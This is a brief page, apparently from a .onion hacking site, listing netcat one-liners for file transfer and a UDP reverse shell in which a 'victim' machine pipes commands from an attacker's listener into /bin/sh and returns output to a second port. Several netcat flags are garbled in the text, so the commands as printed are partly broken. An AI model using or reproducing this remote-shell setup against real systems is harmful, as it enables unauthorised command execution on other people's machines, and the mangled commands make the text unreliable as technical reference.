http://y7egb5vi45k74makeixpfb7jnimfxm3gf233lb3ke2ldonozjk55nvad.onion/udp_hacking.html
Send and receive files Receive a file : nc unlvv p 2929 > filename Send a file : cat file | nc unvv ip_address 2929 Communicating through UDP channels UDP version of this trick uses two UDP ports On attacker – window 1 : nc lun p 2929 – window 2 : nc
lun p 3939 On victim: echo “” | nc un ip 2929 | /bin/sh | nc -un
ip_address 3939 Then, you can type commands in window 1 and see results on window
2 You can test this on your own computer.